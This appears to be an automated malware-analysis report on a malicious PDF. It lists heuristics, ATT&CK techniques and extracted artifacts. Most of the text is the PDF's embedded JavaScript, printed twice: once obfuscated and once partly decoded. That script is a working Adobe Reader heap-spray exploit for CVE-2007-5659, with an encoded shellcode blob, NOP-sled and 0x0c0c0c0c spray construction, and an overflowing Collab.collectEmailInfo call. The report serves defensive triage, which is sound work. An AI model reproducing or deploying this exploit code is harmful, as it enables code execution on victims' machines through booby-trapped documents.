Verdict: MALICIOUS
Risk Score: 238

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1566.001 Spearphishing Attachment
The PDF file contains embedded JavaScript, indicated by multiple heuristic firings including 'PDF_JAVASCRIPT' and 'PDF_JS'. An artifact named 'javascript_obj0031_000.js' was extracted, and static triage signals indicate obfuscation and a long encoded blob. This suggests the JavaScript is designed to perform malicious actions, likely downloading and executing a second-stage payload. The presence of embedded JavaScript within a PDF is a common delivery mechanism for malware.
Machine Learning
- Nyx PDF Classifier: malicious score 0.9988
Heuristics (9)
- Collab.collectEmailInfo — CVE-2007-5659 (critical, CVE exact, CVE_2007_5659): PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (matched in decompressed stream)
- JavaScript action (low, 2 related findings, PDF_JAVASCRIPT): PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Obfuscated multi-stage PDF JavaScript heap-spray exploit (critical, PDF_JS_OBFUSCATED_MULTISTAGE_HEAPSPRAY): PDF JavaScript hidden behind nested stream filters and/or a custom in-JS decoder (rolling-XOR stager) decodes to a heap-spray / ROP chain. The spray is only visible after unwinding those layers, which is why the raw heap-spray rules miss it. This is an obfuscated multi-stage Adobe Reader JavaScript exploit; the dropped Windows payload (often named Win.Trojan.Agent by signature AV) is the second stage, not the delivery mechanism.
- Embedded JS stream (low, PDF_JS): PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Generic recovered JavaScript exploit stage (high, PDF_GENERIC_STAGE_RECOVERY): Bounded static stage recovery exposed hidden JavaScript through generic transforms such as null-byte collapse, percent decoding, marker replacement, arithmetic character codes, fromCharCode, numeric arrays, numeric-array minus-key decoders, alphabet-index arrays, /Producer half-difference metadata arrays, hex literals, marker-stripped Base64 literals, custom 6-bit XOR table decoders, or repeated-marker hex carriers. This rule is emitted only when the recovered stage contains exploit-like Acrobat JavaScript or shellcode markers.
- Suspicious extracted artifact (medium, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded file (low, PDF_EMBEDDED): PDF embeds a file attachment — could carry an executable or another weaponised document as a nested payload.
- Object number defined twice with different bodies (info, PDF_DUPLICATE_OBJ_BODY_INCREMENTAL): The same indirect object (N G) is defined more than once with different body bytes. First-wins and last-wins readers will resolve different content, which is a parser-confusion shape used by targeted PDFs. Body-only differences are common in benign incremental updates, so severity is raised only when the duplicate carries active content.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URLs found in PDF document text:
  - http://www.w3.org/1999/02/22-rdf-syntax-ns#
  - http://ns.adobe.com/pdf/1.3/
  - http://ns.adobe.com/xap/1.0/
  - http://purl.org/dc/elements/1.1/
  - http://ns.adobe.com/xap/1.0/mm/
Extracted artifacts (3)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| k1 | pdf-embedded-file | PDF EmbeddedFile object 26 at offset 0x1EC1 | 2041 bytes | db8557e3348d83bf2d22446e8f0e505303bb00d7ef6d542289d21c4c712998e2 |
| javascript_obj0031_000.js | pdf-javascript-stream | PDF /JS object 31 at offset 0x12B202 | 13125 bytes | e7cd69c470aa49cc3b7565d71b85c61cf70c3955add705414de9860a5705e827 |

Detection (javascript_obj0031_000.js)
- ClamAV: No threats found
- Obfuscation or payload: likely. Carved artifact contains 2 long base64-like blob(s). Carved artifact contains 1 long hex-escaped blob(s).

Preview script (first 1,000 lines of the extracted script):
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30\x25\x75\x39\x30\x39\x30\x25\x75\x65\x62\x39\x30\x25\x755\x6518\x25\x755\x6256\x25\x75068\x61\x25\x75303\x63\x25\x751474\x25\x756\x6266\x25\x7558\x630"+
"\x25\x758\x6146\x25\x75\x33226\x25\x7588\x634\x25\x75430\x33\x25\x75\x65\x6246\x25\x75\x658\x65\x62\x25\x75\x66\x66\x653\x25\x75\x66\x66\x66\x66"+
"\x25\x755048\x25\x755048\x25\x755048\x25\x755048\x25\x755942\x25\x754b43\x25\x755941\x25\x755841\x25\x755841\x25\x754646\x25\x756b41\x25\x757042"+
"\x25\x756c43\x25\x754b48\x25\x754843\x25\x756841\x25\x754b48\x25\x754843\x25\x755441\x25\x754b48\x25\x757843\x25\x754441\x25\x756d48\x25\x754b48"+
"\x25\x754843\x25\x755041\x25\x755643\x25\x757342\x25\x756d48\x25\x755843\x25\x755a43\x25\x755842\x25\x755541\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x754948\x25\x756744\x25\x754348\x25\x757442\x25\x755041\x25\x754348\x25\x757742\x25\x756444\x25\x756341\x25\x754142\x25\x756546\x25\x755445"+
"\x25\x757342\x25\x756843\x25\x754b48\x25\x756443\x25\x754444\x25\x754444\x25\x754b48\x25\x754d43\x25\x756441\x25\x754b48\x25\x754446\x25\x757041"+
"\x25\x757043\x25\x756344\x25\x756542\x25\x754b48\x25\x754243\x25\x757844\x25\x754b48\x25\x755243\x25\x757841\x25\x756344\x25\x756d42\x25\x755342"+
"\x25\x756c41\x25\x754143\x25\x754b48\x25\x756c41\x25\x754b48\x25\x756344\x25\x754542\x25\x756b41\x25\x754f42\x25\x756b41\x25\x757042\x25\x754c42"+
"\x25\x756c48\x25\x754448\x25\x757042\x25\x756446\x25\x756744\x25\x757142\x25\x757745\x25\x755541\x25\x756344\x25\x754842\x25\x755345\x25\x754442"+
"\x25\x756341\x25\x757443\x25\x754444\x25\x757041\x25\x756546\x25\x755142\x25\x754b48\x25\x755243\x25\x754444\x25\x756344\x25\x756d42\x25\x756e43"+
"\x25\x754b48\x25\x755441\x25\x754343\x25\x754b48\x25\x755243\x25\x754441\x25\x756344\x25\x756d42\x25\x754b48\x25\x756444\x25\x754b48\x25\x756344"+
"\x25\x757542\x25\x754948\x25\x754c43\x25\x754444\x25\x754441\x25\x756943\x25\x757342\x25\x757742\x25\x754d43\x25\x756c43\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x756243\x25\x755841\x25\x754d48\x25\x754d43\x25\x755443\x25\x755843\x25\x757846\x25\x755841\x25\x756444\x25\x755841"+
"\x25\x755841\x25\x754f42\x25\x756546\x25\x756441\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x757844\x25\x756b41\x25\x757942"+
"\x25\x756e43\x25\x754b48\x25\x754543\x25\x755443\x25\x754b48\x25\x757543\x25\x756441\x25\x754b48\x25\x754742\x25\x757348\x25\x755942\x25\x757248"+
"\x25\x757742\x25\x756c48\x25\x756a41\x25\x757342\x25\x756a41\x25\x757242\x25\x756a48\x25\x754e42\x25\x757345\x25\x754e42\x25\x757a42\x25\x755242"+
"\x25\x754442\x25\x756243\x25\x755841\x25\x754d48\x25\x754d43\x25\x756843\x25\x755843\x25\x754f42\x25\x756546\x25\x755443\x25\x754b48\x25\x754546"+
"\x25\x756441\x25\x755a43\x25\x754f42\x25\x756546\x25\x754443\x25\x754f42\x25\x754546\x25\x754441\x25\x754b48\x25\x754546\x25\x756843\x25\x757141"+
"\x25\x754546\x25\x755043\x25\x754348\x25\x757543\x25\x755043\x25\x755841\x25\x757743\x25\x757248\x25\x754f42\x25\x756546\x25\x754443\x25\x754f42"+
"\x25\x754546\x25\x755041\x25\x757342\x25\x754e48\x25\x754643\x25\x755641\x25\x755445\x25\x754348\x25\x757948\x25\x757548\x25\x757043\x25\x754b42"+
"\x25\x755748\x25\x754d42\x25\x755741\x25\x756b41\x25\x757a42\x25\x754a48\x25\x755343\x25\x754743\x25\x756344\x25\x757742\x25\x75774b\x25\x756548"+
"\x25\x754f41\x25\x755841\x25\x757443\x25\x754e41\x25\x756d43\x25\x754a42\x25\x754841\x25\x754741\x25\x757143\x25\x755241\x25\x755842\x25\x756c48"+
"\x25\x755041\x25\x756a42\x25\x756646\x25\x756d48\x25\x75534b\x25\x757543\x25\x756f42\x25\x755848\x25\x754e42\x25\x754a48\x25\x755641\x25\x755445"+
"\x25\x755748\x25\x756344\x25\x755441\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x75734b\x25\x75734b\x25\x75734b\x25\x75734b\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x756446"+
"\x25\x756d43\x25\x756543\x25\x757843\x25\x757641\x25\x756d43\x25\x757043\x25\x756d43\x25\x755841\x25\x755842\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755543\x25\x754148\x25\x755545\x25\x756646\x25\x755841\x25\x755841\x25\x755841\x25\x755842\x25\x756c48\x25\x754e42\x25\x754f42"+
"\x25\x754f42\x25\x754b48\x25\x756845\x25\x754b48\x25\x754542\x25\x754b48\x25\x754e42\x25\x754b48\x25\x757645\x25\x754348\x25\x757142\x25\x756841"+
"\x25\x755842\x25\x756f48\x25\x754e42\x25\x754f42\x25\x754f42\x25\x756b41\x25\x757942\x25\x754948\x25\x754543\x25\x755846\x25\x754348\x25\x754d43"+
"\x25\x755846\x25\x756444\x25\x756b41\x25\x757942\x25\x755943\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x754444\x25\x756541"+
"\x25\x75684b\x25\x757a48\x25\x754a41\x25\x755841\x25\x757a43\x25\x755445\x25\x756541\x25\x75684b\x25\x75744b\x25\x754a41\x25\x755841\x25\x756746"+
"\x25\x755542\x25\x757846\x25\x754f42\x25\x755841\x25\x755841\x25\x755841\x25\x756243\x25\x754843\x25\x754f42\x25\x754546\x25\x757441\x25\x754948"+
"\x25\x754d43\x25\x755844\x25\x755843\x25\x757846\x25\x754f42\x25\x755841\x25\x755841\x25\x755841\x25\x754f42\x25\x754546\x25\x755441\x25\x754b48"+
"\x25\x757842\x25\x754b48\x25\x754d43\x25\x755844\x25\x756344\x25\x757142\x25\x754348\x25\x755842\x25\x756544\x25\x757642\x25\x755841\x25\x755841"+
"\x25\x754f42\x25\x756546\x25\x755844\x25\x754f42\x25\x754546\x25\x754841\x25\x756243\x25\x755841\x25\x756243\x25\x755841\x25\x757846\x25\x755841"+
"\x25\x754741\x25\x755841\x25\x755841\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x757841\x25\x756243\x25\x755841\x25\x754d48"+
"\x25\x754d43\x25\x755443\x25\x755843\x25\x756243\x25\x756444\x25\x754d48\x25\x754d43\x25\x754446\x25\x755843\x25\x754f42\x25\x756546\x25\x755846"+
"\x25\x754f42\x25\x754546\x25\x757844\x25\x756243\x25\x755841\x25\x756243\x25\x755841\x25\x757846\x25\x754841\x25\x754741\x25\x755841\x25\x755841"+
"\x25\x754f42\x25\x756546\x25\x755846\x25\x754f42\x25\x754546\x25\x757841\x25\x754546\x25\x756243\x25\x755841\x25\x757846\x25\x75484b\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x756243\x25\x755a41\x25\x756243\x25\x755841\x25\x756243\x25\x755941\x25\x757846\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x754843\x25\x754d48\x25\x754d43\x25\x757846\x25\x755843\x25\x754348\x25\x754d43\x25\x754c41\x25\x756544\x25\x755345\x25\x755241\x25\x754b48"+
"\x25\x754542\x25\x754b48\x25\x754f42\x25\x754546\x25\x754b48\x25\x755445\x25\x754f42\x25\x756e43\x25\x754c41\x25\x755842\x25\x754142\x25\x754f42"+
"\x25\x754f42\x25\x754f42\x25\x755543\x25\x754348\x25\x754842\x25\x754f42\x25\x756546\x25\x755a41\x25\x755345\x25\x756141\x25\x754948\x25\x754d43"+
"\x25\x754443\x25\x757846\x25\x755841\x25\x756444\x25\x755841\x25\x755841\x25\x756243\x25\x754843\x25\x754f42\x25\x754546\x25\x757441\x25\x754948"+
"\x25\x754d43\x25\x756441\x25\x754b48\x25\x754d43\x25\x754446\x25\x754948\x25\x754d43\x25\x755043\x25\x755842\x25\x754243\x25\x754e42\x25\x754f42"+
"\x25\x754f42\x25\x754546\x25\x756b41\x25\x757942\x25\x755943\x25\x754d48\x25\x754d43\x25\x757846\x25\x755843\x25\x754348\x25\x754d43\x25\x757041"+
"\x25\x756544\x25\x755345\x25\x755241\x25\x754b48\x25\x754542\x25\x755048\x25\x755048\x25\x754546\x25\x754b48\x25\x755445\x25\x754f42\x25\x756e43"+
"\x25\x757041\x25\x755842\x25\x754142\x25\x754f42\x25\x754f42\x25\x754f42\x25\x755543\x25\x756243\x25\x755841\x25\x756243\x25\x754f42\x25\x754f42"+
"\x25\x754546\x25\x756444\x25\x755048\x25\x755048\x25\x755048\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755941\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x754843\x25\x755443\x25\x754143\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x754843\x25\x755443\x25\x754143\x25\x755841\x25\x755941\x25\x755941\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x754841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755a41\x25\x755841\x25\x755841\x25\x755841\x25\x755941\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755841\x25\x755a41\x25\x755841\x25\x755841\x25\x755841"+
"\x25\x753030");
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
while (fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length<MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV) fhwpbcVvadNUtmvSVbaNLbnkoRXYJU+=fhwpbcVvadNUtmvSVbaNLbnkoRXYJU;
sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = fhwpbcVvadNUtmvSVbaNLbnkoRXYJU["substring"](0, fhwpbcVvadNUtmvSVbaNLbnkoRXYJU.length-MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV);
while(sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi.length+MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV < 0x40000) sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi+sznjhNiJLuILHtrvAhIXlelnNQIlfFcNrwhdLFMTFZirbIndsSXdpwisjqJYvwiakRqvVOIAdQasdfafjiaehruiuifjkfnznashdkalfnhdsfjKYl;
var dakslfjaljfklasfjasdlk = Array;
afsdfasfcxzfcsdagfdgfgfasdfafacadf = new dakslfjaljfklasfjasdlk();
for(afdadfcznzmzhczjncafahfjkasdhfjkdfh=0;afdadfcznzmzhczjncafahfjkasdhfjkdfh<300;afdadfcznzmzhczjncafahfjkasdhfjkdfh++) afsdfasfcxzfcsdagfdgfgfasdfafacadf[afdadfcznzmzhczjncafahfjkasdhfjkdfh] = sBTKMHSBACOawVsopgevvAiFdFvNBzVHGHi + JpeKAFDjrTfdKIERlblJLAmY;
var iJCYnMqYfdUqJybccHmtjpgocdxIgC = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x75\x30c\x30c\x25\x750c0c");
while(iJCYnMqYfdUqJybccHmtjpgocdxIgC.length < 0x1200) iJCYnMqYfdUqJybccHmtjpgocdxIgC =iJCYnMqYfdUqJybccHmtjpgocdxIgC+iJCYnMqYfdUqJybccHmtjpgocdxIgC;
var adfafasdffsfsdfdfvcvv = Collab;
var dfzfddfgfgasfasddcacs = this;
dfzfddfgfgasfasddcacs.collabStore = adfafasdffsfsdfdfvcvv["collectEmailInfo"]({subj: "",msg: iJCYnMqYfdUqJybccHmtjpgocdxIgC});
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| generic_stage_recovery_000.js | deobfuscated-js | generic stage recovery split-literal-normalize from JavaScript object 31 at offset 0x12B202 | 7665 bytes | bdaf58b20ef070c4a6891300fdd6daf6fc2e9efa2f6eae2b5d2f8160ba6a4b6f |

Detection (generic_stage_recovery_000.js)
- ClamAV: No threats found
- Obfuscation or payload: likely. 12 of 24 identifiers look randomly generated (e.g. 'MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKooui') — consistent with name-mangling obfuscation. Carved artifact contains 2 long base64-like blob(s).

Preview script (first 1,000 lines of the extracted script):
var ahfdhfeiuiofifafjkafahfhdlfadafh=unescape;
var QazWSxeDCrFVtGBUjnIkmOIuplM = ahfdhfeiuiofifafjkafahfhdlfadafh("%u9090%u9090%u9090%ueb90%u5e18%u5b56%u068a%u303c%u1474%u6b66%u58c0%u8a46%u3226%u88c4%u4303%ueb46%ue8eb%uffe3%uffff%u5048%u5048%u5048%u5048%u5942%u4b43%u5941%u5841%u5841%u4646%u6b41%u7042%u6c43%u4b48%u4843%u6841%u4b48%u4843%u5441%u4b48%u7843%u4441%u6d48%u4b48%u4843%u5041%u5643%u7342%u6d48%u5843%u5a43%u5842%u5541%u5841%u5841%u5841%u4948%u6744%u4348%u7442%u5041%u4348%u7742%u6444%u6341%u4142%u6546%u5445%u7342%u6843%u4b48%u6443%u4444%u4444%u4b48%u4d43%u6441%u4b48%u4446%u7041%u7043%u6344%u6542%u4b48%u4243%u7844%u4b48%u5243%u7841%u6344%u6d42%u5342%u6c41%u4143%u4b48%u6c41%u4b48%u6344%u4542%u6b41%u4f42%u6b41%u7042%u4c42%u6c48%u4448%u7042%u6446%u6744%u7142%u7745%u5541%u6344%u4842%u5345%u4442%u6341%u7443%u4444%u7041%u6546%u5142%u4b48%u5243%u4444%u6344%u6d42%u6e43%u4b48%u5441%u4343%u4b48%u5243%u4441%u6344%u6d42%u4b48%u6444%u4b48%u6344%u7542%u4948%u4c43%u4444%u4441%u6943%u7342%u7742%u4d43%u6c43%u5841%u5841%u5841%u5841%u6243%u5841%u4d48%u4d43%u5443%u5843%u7846%u5841%u6444%u5841%u5841%u4f42%u6546%u6441%u4f42%u6546%u5846%u4f42%u4546%u7844%u6b41%u7942%u6e43%u4b48%u4543%u5443%u4b48%u7543%u6441%u4b48%u4742%u7348%u5942%u7248"+
"%u7742%u6c48%u6a41%u7342%u6a41%u7242%u6a48%u4e42%u7345%u4e42%u7a42%u5242%u4442%u6243%u5841%u4d48%u4d43%u6843%u5843%u4f42%u6546%u5443%u4b48%u4546%u6441%u5a43%u4f42%u6546%u4443%u4f42%u4546%u4441%u4b48%u4546%u6843%u7141%u4546%u5043%u4348%u7543%u5043%u5841%u7743%u7248%u4f42%u6546%u4443%u4f42%u4546%u5041%u7342%u4e48%u4643%u5641%u5445%u4348%u7948%u7548%u7043%u4b42%u5748%u4d42%u5741%u6b41%u7a42%u4a48%u5343%u4743%u6344%u7742%u774b%u6548%u4f41%u5841%u7443%u4e41%u6d43%u4a42%u4841%u4741%u7143%u5241%u5842%u6c48%u5041%u6a42%u6646%u6d48%u534b%u7543%u6f42%u5848%u4e42%u4a48%u5641%u5445%u5748%u6344%u5441%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u734b%u734b%u734b%u734b%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u6446%u6d43%u6543%u7843%u7641%u6d43%u7043%u6d43%u5841%u5842%u5841%u5841%u5841%u5841%u5543%u4148%u5545%u6646%u5841%u5841%u5841%u5842%u6c48%u4e42%u4f42%u4f42%u4b48%u6845%u4b48%u4542%u4b48%u4e42%u4b48%u7645%u4348%u7142%u6841"+
"%u5842%u6f48%u4e42%u4f42%u4f42%u6b41%u7942%u4948%u4543%u5846%u4348%u4d43%u5846%u6444%u6b41%u7942%u5943%u4f42%u6546%u5846%u4f42%u4546%u4444%u6541%u684b%u7a48%u4a41%u5841%u7a43%u5445%u6541%u684b%u744b%u4a41%u5841%u6746%u5542%u7846%u4f42%u5841%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948%u4d43%u5844%u5843%u7846%u4f42%u5841%u5841%u5841%u4f42%u4546%u5441%u4b48%u7842%u4b48%u4d43%u5844%u6344%u7142%u4348%u5842%u6544%u7642%u5841%u5841%u4f42%u6546%u5844%u4f42%u4546%u4841%u6243%u5841%u6243%u5841%u7846%u5841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42%u4546%u7841%u6243%u5841%u4d48%u4d43%u5443%u5843%u6243%u6444%u4d48%u4d43%u4446%u5843%u4f42%u6546%u5846%u4f42%u4546%u7844%u6243%u5841%u6243%u5841%u7846%u4841%u4741%u5841%u5841%u4f42%u6546%u5846%u4f42%u4546%u7841%u4546%u6243%u5841%u7846%u484b%u5841%u5841%u5841%u6243%u5a41%u6243%u5841%u6243%u5941%u7846%u5841%u5841%u5841%u4843%u4d48%u4d43%u7846%u5843%u4348%u4d43%u4c41%u6544%u5345%u5241%u4b48%u4542%u4b48%u4f42%u4546%u4b48%u5445%u4f42%u6e43%u4c41%u5842%u4142%u4f42%u4f42%u4f42%u5543%u4348%u4842%u4f42%u6546%u5a41%u5345%u6141%u4948%u4d43%u4443%u7846%u5841%u6444%u5841%u5841%u6243%u4843%u4f42%u4546%u7441%u4948"+
"%u4d43%u6441%u4b48%u4d43%u4446%u4948%u4d43%u5043%u5842%u4243%u4e42%u4f42%u4f42%u4546%u6b41%u7942%u5943%u4d48%u4d43%u7846%u5843%u4348%u4d43%u7041%u6544%u5345%u5241%u4b48%u4542%u5048%u5048%u4546%u4b48%u5445%u4f42%u6e43%u7041%u5842%u4142%u4f42%u4f42%u4f42%u5543%u6243%u5841%u6243%u4f42%u4f42%u4546%u6444%u5048%u5048%u5048%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5941%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u4843%u5443%u4143%u5841%u5841%u5841%u5841%u5841"+
"%u4843%u5443%u4143%u5841%u5941%u5941%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u4841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5a41%u5841%u5841%u5841%u5941%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5841%u5a41%u5841%u5841%u5841%u3030");
var o ="";
for (asdfafjiaehruiuifjkfnznashdkalfnhdsfj=128;asdfafjiaehruiuifjkfnznashdkalfnhdsfj>=0;--asdfafjiaehruiuifjkfnznashdkalfnhdsfj) o += ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
JpeKAFDjrTfdKIERlblJLAmY = o + QazWSxeDCrFVtGBUjnIkmOIuplM;
fhwpbcVvadNUtmvSVbaNLbnkoRXYJU = ahfdhfeiuiofifafjkafahfhdlfadafh("\x25\x754943\x25\x759f93");
NGwa = 20;
MNBVzxcASDFkjhOIUYhbbREDSDSQazxCVBNKoouiTFDFcfvVBhghdswwqaZXVBNMNKLPouytfvvEDXcvbbHYTrcvIOPPKLmXZSsfcWWSXXQAZryiJNV = NGwa+JpeKAFDjrTfdKIERlblJLAmY.length
